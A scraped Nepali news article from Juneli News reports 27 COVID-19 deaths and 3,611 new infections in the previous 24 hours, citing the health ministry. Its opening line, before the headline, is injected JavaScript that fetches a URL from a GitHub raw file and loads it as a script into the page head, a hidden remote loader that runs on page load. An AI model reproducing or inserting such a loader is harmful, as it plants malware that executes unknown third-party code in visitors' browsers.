;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); पछिल्लो २४ घन्टामा कोरोना भाइरसबाट २७ जनाको मृत्यु संक्रमितको संख्या दोब्बर – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • पछिल्लो २४ घन्टामा कोरोना भाइरसबाट २७ जनाको मृत्यु संक्रमितको संख्या दोब्बर
Breaking News

पछिल्लो २४ घन्टामा कोरोना भाइरसबाट २७ जनाको मृत्यु संक्रमितको संख्या दोब्बर

जुनेली न्यूज, काठमाण्डौ।पछिल्लो २४ घन्टामा कोरोना भाइरसबाट २७ जनाको मृत्यु भएको छ |

पछिल्लो २४ घण्टामा ९ हजार ७८३ पीसीआर परीक्षण गर्दा 2 हजार ४६७ जना  र ४ हजार ८७८ एन्टिजेन परीक्षण गर्दा १ हजार १४४ गरी ३ हजार ६११ जनामा कोरोना भाइरसको संक्रमण देखिएको स्वास्थ्य तथा जनसंख्या मन्त्रालयले जनाएको छ ।

यस्तै पछिल्लो २४ घण्टामा कोरोना संक्रमणबाट निको हुनेको संख्या १ हजार ८१६ जना रहेको छ |

फेसबुक प्रतिक्रियाहरु